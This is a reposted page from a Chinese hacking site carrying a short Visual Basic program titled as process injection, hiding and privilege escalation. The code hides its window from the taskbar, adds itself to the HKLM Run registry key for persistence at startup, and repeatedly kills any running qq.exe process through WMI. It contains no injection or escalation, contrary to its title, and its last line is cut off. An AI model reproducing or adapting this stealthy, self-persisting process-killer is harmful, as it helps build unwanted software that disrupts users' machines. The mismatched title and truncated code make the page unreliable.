安全黑客
当前位置:安全黑客文章资讯编程技术VB编程
日期:2011-03-26 23:00:00  来源:本站整理

<b>VB中注入躲藏进程,和提权</b>[VB编程]

赞助商链接



  本文“<b>VB中注入躲藏进程,和提权</b>[VB编程]”是由安全黑客为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:
Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long ' Note that if you declare the lpData parameter as String, you must pass it By Value.
Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Private Const REG_SZ = 1
Const HKEY_LOCAL_MACHINE = &H80000002

Private Sub SaveString(hKey As Long, strPath As String, strValue As String, strData As String)
Dim keyHand As Long
Dim R As Long
R = RegCreateKey(hKey, strPath, keyHand)
R = RegSetValueEx(keyHand, strValue, 0, REG_SZ, ByVal strData, LenB(StrConv(strData, vbFromUnicode)))
R = RegCloseKey(keyHand)
End Sub
Private Sub Form_Load()
App.TaskVisible = False
Dim fname As String
If Right(App.Path, 1) = "\" Then
fname = App.Path
Else
fname = App.Path & "\"
End If
SaveString HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Run", "T-520", fname & App.EXEName & ".exe"
End Sub

Private Sub Timer1_Timer()
Dim objWMIService As Object
Dim colProcesslist As Object
Dim objProcess As Object
Set objWMIService = CreateObject("winmgmts:{impersonationLevel=Impersonate}!root\cimv2")
Set colProcesslist = objWMIService.ExecQuery("select * from win32_process where name='qq.exe'")
For Each objProcess In colProcesslist
objProcess.Terminate
Next
End Su

  以上是“<b>VB中注入躲藏进程,和提权</b>[VB编程]”的内容,如果你对以上该文章内容感兴趣,你可以看看安全黑客为您推荐以下文章:
  • HP智能管理中心FaultDownloadServlet信息泄露漏洞
  • Palo Alto Networks的防火墙到一个新的水平
  • LTE带来了新的安全问题,电信运营商
  • iPhone的Multi-Touch技术的MacBook在10月?
  • McAfee的SmartFilter管理服务器SFAdminSrv.exe JBoss的RMI远程执行代码Vulnerabilty
  • Oracle表格识别CroScPlt.dll ActiveX控件远程代码执行Vulnerabilty
  • Oracle的WebCenter表格识别Sssplt30.ocx ActiveX控件远程代码执行Vulnerabilty的
  • RealNetworks公司的RealPlayer IVR MLTI块长度解析远程代码执行漏洞
  • HP Data Protector的笔记本电脑扩展策略服务器LogBackupLocationStatus远程SQL注入Vulnerabilty
  • HP Data Protector的笔记本扩展策略服务器LogClientInstallation远程SQL注入Vulnerabilty
  • HP Data Protector的笔记本扩展GetPolicies远程SQL注入Vulnerabilty
  • HP Data Protector的笔记本电脑扩展策略服务器RequestCopy远程SQL注入Vulnerabilty
  • 本文地址: 与您的QQ/BBS好友分享!

    文章评论评论内容只代表网友观点,与本站立场无关!

       评论摘要(共 0 条,得分 0 分,平均 0 分) 查看完整评论
    免责条款 - 广告合作 - 下载声明 - 欢迎投稿 - 友情连接 - 网站地图 -
    Copyright © 2012-2013 www.110hack.com. All Rights Reserved .